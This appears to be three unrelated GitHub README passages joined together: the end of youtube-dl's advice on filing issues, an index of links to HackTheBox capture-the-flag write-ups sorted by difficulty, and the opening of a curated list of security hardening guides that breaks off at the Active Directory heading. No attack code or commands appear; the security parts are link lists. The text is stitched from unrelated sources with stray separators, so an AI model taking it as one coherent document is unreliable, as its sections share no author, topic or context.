Make sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/ytdl-org/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of "This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...". While some issues may be old, a new post into them often spurs rapid activity.
### Why are existing options not enough?
Before requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/ytdl-org/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem.
### Is there enough context in your bug report?
People want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one).
We are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful.
### Does the issue involve one problem, and one problem only?
Some of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones.
In particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service.
### Is anyone going to need the feature?
Only post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them.
### Is your question about youtube-dl?
It may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug.
# COPYRIGHT
youtube-dl is released into the public domain by the copyright holders.
This README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.
|
# HackTheBox Boxes
![ARZ](https://www.hackthebox.eu/badge/image/283411)
## Very Easy
Box | OS
--- | ---
[Pathfinder](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Pathfinder.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Archetype](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Archetype.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
## Easy
Box | OS
--- | ---
[Active](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Active.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Forest](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Forest.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Omni](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Omni.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Doctor](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Doctor.md) | <img src= "https://i.imgur.com/hZoovNY.png"/>
[Script Kiddie](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Script_Kiddie.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Spectra](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Spectra.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Delivery](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Deilvery.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Laboratory](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Laboratory.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Armageddon](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Armageddon.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Love](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Love.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Legacy](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Legacy.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Knife](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Knife.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Buff](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Buff.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Bastioin](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Bastion.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Cap-TBA](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Cap.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Explore](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Explore.md) | <img src="https://i.imgur.com/eZSccPd.png"/>
[Heist](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Heist.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Writeup](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Writeup.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Shocker](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Shocker.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Traverxec](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Traverxec.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[OpenAdmin](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/OpenAdmin.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Cap](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Cap.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[BountyHunter](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/BountyHunter.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Lame](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Lame.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Sauna](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Sauna.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Horizontall](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Horizontall.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Good Game](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/GoodGame.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Driver](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Driver.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Secret](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Secret.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
## Medium
Box | OS
--- | ---
[Notebook](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Notebook.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Ready](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Ready.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Bucket](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Bucket.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Schooled](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Schooled.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Tenet](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Tenet.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Atom](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Atom.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Ophiuchi](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Ophiuchi.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[ChatterBox](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Chatterbox.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Dynstr](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Dynstr.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Intelligence](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Intelligence.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Monteverde](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Monteverde.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Writer](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Writer.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Resolute](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Resolute.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Cascade](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Cascade.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Forge](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Forge.md) | <img src="https://i.imgur.com/hZoovNY.png"/>
[Shibboleth](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Shibboleth.md) |<img src="https://i.imgur.com/hZoovNY.png"/>
## Hard
Box | OS
--- | ---
[Breadcrumbs](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Breadcrumbs.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Monitor](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Monitor.md) | <img src= "https://i.imgur.com/hZoovNY.png"/>
[Unobtanium](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Unobtainium.md) | <img src= "https://i.imgur.com/hZoovNY.png"/>
[Spider](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Spider.md) | <img src= "https://i.imgur.com/hZoovNY.png"/>
[Pikaboo](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Pikaboo.md) | <img src= "https://i.imgur.com/hZoovNY.png"/>
[BlackField](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/BlackField.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Mantis](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Mantis.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Reel](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Reel.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
[Object](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Object.md) | <img src="https://i.imgur.com/8SPmSeo.gif"/>
## Insane
Box | OS
--- | ---
[Anubis](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Anubis.md) |<img src="https://i.imgur.com/8SPmSeo.gif"/>
[Sizzle](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Sizzle.md) |<img src="https://i.imgur.com/8SPmSeo.gif"/>
# Challenges
## Easy
Challenge |Category
--- | ---
[Emdee five for life-TBA](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/MD5-4-life.md) | Web
[Toxic](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Toxic.md) | Web
[Gunship](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Gunship.md) | Web
[Cat](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Cat.md) | Mobile
[misDIRection](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/misDIRection.md) | Misc
[Illumination](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Illumination.md) | Forensics
[Canvas](https://github.com/AbdullahRizwan101/CTF-Writeups/blob/master/HackTheBox/Canvas.md) | Misc
|
# awesome-security-hardening
[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
A collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.
This is work in progress: please contribute by sending your suggestions. You may do this by creating [issue tickets](https://github.com/decalage2/awesome-security-hardening/issues) or forking, editing and sending pull requests. You may also send suggestions on Twitter to [@decalage2](https://twitter.com/decalage2), or use https://www.decalage.info/contact
------
# Table of Contents
- [Security Hardening Guides and Best Practices](#security-hardening-guides-and-best-practices)
- [Hardening Guide Collections](#hardening-guide-collections)
- [GNU/Linux](#gnulinux)
- [Red Hat Enterprise Linux - RHEL](#red-hat-enterprise-linux---rhel)
- [CentOS](#centos)
- [SUSE](#suse)
- [Ubuntu](#ubuntu)
- [Windows](#windows)
- [macOS](#macos)
- [Network Devices](#network-devices)
- [Switches](#switches)
- [Routers](#routers)
- [IPv6](#ipv6)
- [Firewalls](#firewalls)
- [Virtualization - VMware](#virtualization---vmware)
- [Containers - Docker - Kubernetes](#containers---docker---kubernetes)
- [Services](#services)
- [SSH](#ssh)
- [TLS/SSL](#tlsssl)
- [Web Servers](#web-servers)
- [Apache HTTP Server](#apache-http-server)
- [Apache Tomcat](#apache-tomcat)
- [Eclipse Jetty](#eclipse-jetty)
- [Microsoft IIS](#microsoft-iis)
- [Mail Servers](#mail-servers)
- [FTP Servers](#ftp-servers)
- [Database Servers](#database-servers)
- [Active Directory](#active-directory)
- [ADFS](#adfs)
- [Kerberos](#kerberos)
- [LDAP](#ldap)
- [DNS](#dns)
- [NTP](#ntp)
- [NFS](#nfs)
- [CUPS](#cups)
- [Authentication - Passwords](#authentication---passwords)
- [Hardware - CPU - BIOS - UEFI](#hardware---cpu---bios---uefi)
- [Cloud](#cloud)
- [Tools](#tools)
- [Tools to check security hardening](#tools-to-check-security-hardening)
- [GNU/Linux](#gnulinux-1)
- [Windows](#windows-1)
- [Network Devices](#network-devices-1)
- [TLS/SSL](#tlsssl-1)
- [SSH](#ssh-1)
- [Hardware - CPU - BIOS - UEFI](#hardware---cpu---bios---uefi-1)
- [Docker](#docker)
- [Cloud](#cloud-1)
- [Tools to apply security hardening](#tools-to-apply-security-hardening)
- [GNU/Linux](#gnulinux-2)
- [Windows](#windows-2)
- [TLS/SSL](#tlsssl-2)
- [Cloud](#cloud-2)
- [Password Generators](#password-generators)
- [Books](#books)
- [Other Awesome Lists](#other-awesome-lists)
- [Other Awesome Security Lists](#other-awesome-security-lists)
------
# Security Hardening Guides and Best Practices
## Hardening Guide Collections
- [CIS Benchmarks](https://www.cisecurity.org/cis-benchmarks/) (registration required)
- [ANSSI Best Practices](https://www.ssi.gouv.fr/en/best-practices/)
- [NSA Security Configuration Guidance](https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/)
- [NSA Cybersecurity Resources for Cybersecurity Professionals](https://www.nsa.gov/Cybersecurity/) and [NSA Cybersecurity publications](https://nsacyber.github.io/publications.html)
- [US DoD DISA Security Technical Implementation Guides (STIGs) and Security Requirements Guides (SRGs)](https://public.cyber.mil/stigs/)
- [OpenSCAP Security Policies](https://www.open-scap.org/security-policies/)
- [Australian Cyber Security Center Publications](https://www.cyber.gov.au/publications)
- [FIRST Best Practice Guide Library (BPGL)](https://www.first.org/resources/guides/)
- [Harden the World](http://hardentheworld.org/) - a collection of hardening guidelines for devices, applications and OSs (mostly Apple for now).
## GNU/Linux
- [ANSSI - Configuration recommendations of a GNU/Linux system](https://www.ssi.gouv.fr/en/guide/configuration-recommendations-of-a-gnulinux-system/)
- [CIS Benchmark for Distribution Independent Linux](https://www.cisecurity.org/benchmark/distribution_independent_linux/)
- [trimstray - The Practical Linux Hardening Guide](https://github.com/trimstray/the-practical-linux-hardening-guide) - practical step-by-step instructions for building your own hardened systems and services. Tested on CentOS 7 and RHEL 7.
- [trimstray - Linux Hardening Checklist](https://github.com/trimstray/linux-hardening-checklist) - most important hardening rules for GNU/Linux systems (summarized version of The Practical Linux Hardening Guide)
- [How To Secure A Linux Server](https://github.com/imthenachoman/How-To-Secure-A-Linux-Server) - for a single Linux server at home
- [nixCraft - 40 Linux Server Hardening Security Tips (2019 edition)](https://www.cyberciti.biz/tips/linux-security.html)
- [nixCraft - Tips To Protect Linux Servers Physical Console Access](https://www.cyberciti.biz/tips/tips-to-protect-linux-servers-physical-console-access.html)
- [TecMint - 4 Ways to Disable Root Account in Linux](https://www.tecmint.com/disable-root-login-in-linux/)
- [ERNW - IPv6 Hardening Guide for Linux Servers](https://www.ernw.de/download/ERNW_Guide_to_Securely_Configure_Linux_Servers_For_IPv6_v1_0.pdf)
- [trimstray - Iptables Essentials: Common Firewall Rules and Commands](https://github.com/trimstray/iptables-essentials)
- [Neo23x0/auditd](https://github.com/Neo23x0/auditd) - Best Practice Auditd Configuration
### Red Hat Enterprise Linux - RHEL
- [Red Hat - A Guide to Securing Red Hat Enterprise Linux 7](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html-single/security_guide/index)
- [DISA STIGs - Red Hat Enterprise Linux 7](https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=unix-linux) (2019)
- [CIS Benchmark for Red Hat Linux](https://www.cisecurity.org/benchmark/red_hat_linux/)
- [nixCraft - How to set up a firewall using FirewallD on RHEL 8](https://www.cyberciti.biz/faq/configure-set-up-a-firewall-using-firewalld-on-rhel-8/)
### CentOS
- [Lisenet - CentOS 7 Server Hardening Guide](https://www.lisenet.com/2017/centos-7-server-hardening-guide/) (2017)
- [HighOn.Coffee - Security Harden CentOS 7](https://highon.coffee/blog/security-harden-centos-7/) (2015)
### SUSE
- [SUSE Linux Enterprise Server 12 SP4 Security Guide](https://www.suse.com/documentation/sles-12/singlehtml/book_security/book_security.html)
- [SUSE Linux Enterprise Server 12 Security and Hardening Guide](https://www.suse.com/documentation/sles-12/book_hardening/data/book_hardening.html)
### Ubuntu
- [Ubuntu documentation - Security](https://help.ubuntu.com/lts/serverguide/security.html.en)
- [Ubuntu wiki - Security Hardening Features](https://wiki.ubuntu.com/Security/Features)
## Windows
- [Microsoft - Windows security baselines](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-baselines)
- [Microsoft - Windows Server Security | Assurance](https://docs.microsoft.com/en-us/windows-server/security/security-and-assurance)
- [Microsoft - Windows 10 Enterprise Security](https://docs.microsoft.com/en-us/windows/security/)
- [BSI/ERNW - Configuration Recommendations for Hardening of Windows 10 Using Built-in Functionalities](https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Studien/SiSyPHuS_Win10/SiSyPHuS.html?nn=1022786) (2021) - focused on Windows 10 LTSC 2019
- [ACSC - Hardening Microsoft Windows 10, version 21H1, Workstations](https://www.cyber.gov.au/acsc/view-all-content/publications/hardening-microsoft-windows-10-version-21h1-workstations)
- [ACSC - Securing PowerShell in the Enterprise](https://www.cyber.gov.au/publications/securing-powershell-in-the-enterprise)
- [Awesome Windows Domain Hardening](https://github.com/PaulSec/awesome-windows-domain-hardening)
- [Microsoft - How to detect, enable and disable SMBv1, SMBv2, and SMBv3 in Windows and Windows Server](https://support.microsoft.com/en-gb/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server)
- [Microsoft recommended block rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) - List of applications or files that can be used by an attacker to circumvent application whitelisting policies
- [ERNW - IPv6 Hardening Guide for Windows Servers](https://www.ernw.de/download/ERNW_Guide_to_Configure_Securely_Windows_Servers_For_IPv6_v1_0.pdf)
- [NSA - AppLocker Guidance](https://github.com/nsacyber/AppLocker-Guidance) - Configuration guidance for implementing application whitelisting with AppLocker
- [NSA - Pass the Hash Guidance](https://github.com/nsacyber/Pass-the-Hash-Guidance) - Configuration guidance for implementing Pass-the-Hash mitigations (Archived)
- [NSA - BitLocker Guidance](https://github.com/nsacyber/BitLocker-Guidance) - Configuration guidance for implementing disk encryption with BitLocker
- [NSA - Event Forwarding Guidance](https://github.com/nsacyber/Event-Forwarding-Guidance) - Configuration guidance for implementing collection of security relevant Windows Event Log events by using Windows Event Forwarding
- [Windows Defense in Depth Strategies](https://docs.google.com/document/d/1_43UroB0zY4-R2E2r_nH4ndYpDmXAY8g0oTp8yWlwBk/edit?usp=sharing) - work in progress
- [Endpoint Isolation with the Windows Firewall](https://medium.com/@cryps1s/endpoint-isolation-with-the-windows-firewall-462a795f4cfb) based on Jessica Payne’s [‘Demystifying the Windows Firewall’](https://www.youtube.com/watch?v=InPiE0EOArs) talk from Ignite 2016
See also [Active Directory](#active-directory) and [ADFS](#adfs) below.
## macOS
- [ERNW - IPv6 Hardening Guide for OS-X](https://www.ernw.de/download/ERNW_Hardening_IPv6_MacOS-X_v1_0.pdf)
## Network Devices
- [NSA - Harden Network Devices](https://media.defense.gov/2020/Aug/18/2002479461/-1/-1/0/HARDENING_NETWORK_DEVICES.PDF) (PDF) - very short but good summary
### Switches
- [DISA - Layer 2 Switch SRG v2r1](https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_Layer_2_Switch_V2R1_SRG.zip)
### Routers
- [NSA - A Guide to Border Gateway Protocol (BGP) Best Practices](https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/ctr-guide-to-border-gateway-protocol-best-practices.pdf?v=1)
### IPv6
- [NSA - IPv6 Security Guidance](https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF) (Jan 2023)
- ERNW - Developing an Enterprise IPv6 Security Strategy [Part 1](https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/), [Part 2](https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-2-network-isolation-on-the-routing-layer/), [Part 3](https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-3-traffic-filtering-in-ipv6-networks-i/), [Part 4](https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-4-traffic-filtering-in-ipv6-networks-ii/) - Network Isolation on the Routing Layer, Traffic Filtering in IPv6 Networks
- see also IPv6 links under GNU/Linux, Windows and macOS
### Firewalls
- [NIST SP 800-41 Rev 1 - Guidelines on Firewalls and Firewall Policy](https://www.nist.gov/publications/guidelines-firewalls-and-firewall-policy) (2009)
- [trimstray - Iptables Essentials: Common Firewall Rules and Commands](https://github.com/trimstray/iptables-essentials)
## Virtualization - VMware
- [VMware Security Hardening Guides](https://www.vmware.com/security/hardening-guides.html) - covers most VMware products and versions
- [CIS VMware ESXi 6.5 Benchmark](https://www.cisecurity.org/benchmark/vmware/) (2018)
- [DISA STIGs - Virtualisation](https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=virtualization) - VMware vSphere 6.0 and 5
- [ENISA - Security aspects of virtualization](https://www.enisa.europa.eu/publications/security-aspects-of-virtualization) - generic, high-level best practices for virtualization and containers (Feb 2017)
- [NIST SP 800-125 - Guide to Security for Full Virtualization Technologies](https://www.nist.gov/publications/guide-security-full-virtualization-technologies) - (2011)
- [NIST SP 800-125A Revision 1 - Security Recommendations for Server-based Hypervisor Platforms](https://csrc.nist.gov/publications/detail/sp/800-125a/rev-1/final) (2018)
- [NIST SP 800-125B Secure Virtual Network Configuration for Virtual Machine (VM) Protection](https://csrc.nist.gov/publications/detail/sp/800-125b/final) (2016)
- [ANSSI - Recommandations de sécurité pour les architectures basées sur VMware vSphere ESXi](https://www.ssi.gouv.fr/guide/recommandations-de-securite-pour-les-architectures-basees-sur-vmware-vsphere-esxi/) - for VMware 5.5 (2016), in French
- [ANSSI - Problématiques de sécurité associées à la virtualisation des systèmes d’information](https://www.ssi.gouv.fr/administration/guide/problematiques-de-securite-associees-a-la-virtualisation-des-systemes-dinformation/) (2013), in French
- [VMware - Protecting vSphere From Specialized Malware](https://core.vmware.com/vsphere-esxi-mandiant-malware-persistence) (2022) - see also [Mandiant - Bad VIB(E)s Part Two: Detection and Hardening within ESXi Hypervisors](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
## Containers - Docker - Kubernetes
- [How To Harden Your Docker Containers](https://www.secjuice.com/how-to-harden-docker-containers/)
- [CIS Docker Benchmarks](https://www.cisecurity.org/benchmark/docker/) - registration required
- [NIST SP 800-190 - Application Container Security Guide](https://www.nist.gov/publications/application-container-security-guide)
- [A Practical Introduction to Container Security](https://cloudberry.engineering/article/practical-introduction-container-security/)
- [ANSSI - Recommandations de sécurité relatives au déploiement de conteneurs Docker](https://www.ssi.gouv.fr/guide/recommandations-de-securite-relatives-au-deploiement-de-conteneurs-docker/) (2020), in French
- [Kubernetes Security Checklist](https://kubernetes.io/docs/concepts/security/security-checklist/)
- [Kubernetes Role Based Access Control Good Practices](https://kubernetes.io/docs/concepts/security/rbac-good-practices/)
- [Kubernetes Multi-tenancy](https://kubernetes.io/docs/concepts/security/multi-tenancy/)
- [Kubernetes blog - A Closer Look at NSA/CISA Kubernetes Hardening Guidance](https://kubernetes.io/blog/2021/10/05/nsa-cisa-kubernetes-hardening-guidance/#building-secure-container-images)
## Services
### SSH
- [NIST IR 7966 - Security of Interactive and Automated Access Management Using Secure Shell (SSH)](https://nvlpubs.nist.gov/nistpubs/ir/2015/NIST.IR.7966.pdf)
- [ANSSI - (Open)SSH secure use recommendations](https://www.ssi.gouv.fr/en/guide/openssh-secure-use-recommendations/)
- [Linux Audit - OpenSSH security and hardening](https://linux-audit.com/audit-and-harden-your-ssh-configuration/)
- [Positron Security SSH Hardening Guides](https://www.sshaudit.com/hardening_guides.html) (2017-2018) - focused on crypto algorithms
- [stribika - Secure Secure Shell](https://stribika.github.io/2015/01/04/secure-secure-shell.html) (2015) - some algorithm recommendations might be slightly outdated
- [Applied Crypto Hardening: bettercrypto.org](https://bettercrypto.org/) - handy reference on how to configure the most common services’ crypto settings (TLS/SSL, PGP, SSH and other cryptographic tools)
- [IETF - Key Exchange (KEX) Method Updates and Recommendations for Secure Shell (SSH) draft-ietf-curdle-ssh-kex-sha2-10](https://tools.ietf.org/html/draft-ietf-curdle-ssh-kex-sha2-10) - update to the recommended set of key exchange methods for use in the Secure Shell (SSH) protocol to meet evolving needs for stronger security. This document updates RFC 4250.
- [Gravitational - How to SSH Properly](https://gravitational.com/blog/how-to-ssh-properly) - how to configure SSH to use certificates and two-factor authentication
### TLS/SSL
- [NIST SP800-52 Rev 2 (2nd draft) - Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations](https://csrc.nist.gov/publications/detail/sp/800-52/rev-2/draft) - 2018, recommends TLS 1.3
- [Netherlands NCSC - IT Security Guidelines for Transport Layer Security (TLS)](https://english.ncsc.nl/publications/publications/2021/january/19/it-security-guidelines-for-transport-layer-security-2.1) - 2021
- [ANSSI - Security Recommendations for TLS](https://www.ssi.gouv.fr/en/guide/security-recommendations-for-tls/) - 2017, does not cover TLS 1.3
- [Qualys SSL Labs - SSL and TLS Deployment Best Practices](https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices) - 2017, does not cover TLS 1.3
- [RFC 7540 Appendix A TLS 1.2 Cipher Suite Black List](https://tools.ietf.org/html/rfc7540#appendix-A)
- [Applied Crypto Hardening: bettercrypto.org](https://bettercrypto.org/) - handy reference on how to configure the most common services’ crypto settings (TLS/SSL, PGP, SSH and other cryptographic tools)
### Web Servers
- [Cipherlist.eu - Strong Ciphers for Apache, nginx and Lighttpd](https://cipherlist.eu/)
#### Apache HTTP Server
- [Apache HTTP Server documentation - Security Tips](http://httpd.apache.org/docs/current/misc/security_tips.html)
- [GeekFlare - Apache Web Server Hardening and Security Guide](https://geekflare.com/apache-web-server-hardening-security/)
- [Apache Config - Apache Security Hardening Guide](https://www.apachecon.eu/)
#### Apache Tomcat
- [Apache Tomcat 9 Security Considerations](https://tomcat.apache.org/tomcat-9.0-doc/security-howto.html) / [v8](https://tomcat.apache.org/tomcat-8.0-doc/security-howto.html) / [v7](https://tomcat.apache.org/tomcat-7.0-doc/security-howto.html)
- [OWASP Securing tomcat](https://www.owasp.org/index.php/Securing_tomcat)
- [How to get Tomcat 9 to work with authbind to bind to port 80](https://serverfault.com/questions/889122/how-to-get-tomcat-9-to-work-with-authbind-to-bind-to-port-80)
#### Eclipse Jetty
- [Eclipse Jetty - Configuring Security](https://www.eclipse.org/jetty/documentation/current/configuring-security.html)
- [Jetty hardening](https://virgo47.wordpress.com/2015/02/07/jetty-hardening/) (2015)
#### Microsoft IIS
- [CIS Microsoft IIS Benchmarks](https://learn.cisecurity.org/benchmarks)
### Mail Servers
- [MDaemon - 15 Best Practices for Protecting Your Email](https://blog.mdaemon.com/15-best-practices-for-protecting-your-email-with-security-gateway) - Generic recommandations but based on MDaemon Security Gateway for Email Servers
### FTP Servers
- [JSCAPE - Guide for securing FTP](https://www.jscape.com/blog/the-ultimate-guide-to-hardening-your-secure-file-transfer-server) - Generic recommandations but based on JSCAPE MFT Server
### Database Servers
- [Netwrix - MS SQL Server Hardening Best Practices](https://www.netwrix.com/sql_server_security_best_practices.html)
### Active Directory
